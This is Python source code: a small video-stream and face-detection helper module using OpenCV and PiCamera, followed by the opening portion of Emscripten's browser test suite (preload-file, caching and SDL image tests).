self._numFrames = 0
def start(self):
self._start = datetime.datetime.now()
return self
def stop(self):
self._end = datetime.datetime.now()
def update(self):
self._numFrames += 1
def elapsed(self):
return(self._end - self._start).total_seconds()
def fps(self):
return self._numFrames / self.elapsed()
#This class threads the camera read
class WebcamVideoStream:
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
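        # Frames are grabbed on a background daemon thread so read() always returns the latest frame without blocking.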
self.t = Thread(target=self.update, args=())
self.t._stop_event = Event()
def start(self):
self.t.daemon = True
self.t.start()
return self
def update(self):
while(True):
if(self.stopped):
break
else:
(self.grabbed, self.frame) = self.stream.read()
return
def read(self):
return self.frame
def stop(self):
self.stopped = True
self.t._stop_event.set()
self.t.join(3)
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=32):
from picamera.array import PiRGBArray
from picamera import PiCamera
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port=True)
self.frame = None
self.stopped = False
def start(self):
#self.update()
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
for f in self.stream:
self.frame = f.array
self.rawCapture.truncate(0)
if(self.stopped):
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
return self.frame
def stop(self):
self.stopped = True
class VideoStream:
def __init__(self, src=0, usePiCamera=True, resolution=(320, 240), framerate=32):
if usePiCamera:
self.stream = PiVideoStream(resolution=resolution, framerate=framerate)
else:
self.stream = WebcamVideoStream(src=src)
def start(self):
return self.stream.start()
def update(self):
self.stream.update()
def read(self):
return self.stream.read()
def stop(self):
self.stream.stop()
class TempImage:
def __init__(self, basePath="./", ext=".jpg"):
# construct the file path
self.path = "{base_path}/{rand}{ext}".format(base_path=basePath,
rand=str(uuid.uuid4()), ext=ext)
def cleanup(self):
# remove the file
os.remove(self.path)
class FaceDetector:
def __init__(self, faceCascadePath):
self.faceCascade = cv2.CascadeClassifier(faceCascadePath)
def detect(self, image, scaleFactor =1.1, minNeighbors=5, minSize=(30,30)):
rects = self.faceCascade.detectMultiScale(image, scaleFactor=scaleFactor, minNeighbors=minNeighbors, minSize=minSize, flags=cv2.CASCADE_SCALE_IMAGE)
return rects
def test(self):
print("yes")
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER
from runner import no_wasm_backend, create_test_file, parameterized, ensure_dir
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, V8_ENGINE
from tools.shared import try_delete
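# Helper for the chunked XHR test: serves `data` over a local HTTP server and, when support_byte_ranges is set, honors Range requests so the client can fetch it in chunks.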
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
    # system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest(['src.cpp', '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4', '-o', 'page.html'])
self.run_browser('page.html', None, '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
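# The shell above installs a window.onerror handler that reports 1 only when the
# thrown error message mentions test.data; each scenario below makes the preloaded
# test.data unreachable (moved away, bogus protocol, wrong port), so what gets
# reported is the package loader's failure path.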
def test():
# test that a missing file causes xhr.onload to run with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also gives -O2 coverage for --preload-file and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
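# The injected script below wraps window.close so that doReftest() only runs after
# pending requestAnimationFrame callbacks have fired and the screen has updated,
# and the window is closed a few seconds later.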
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
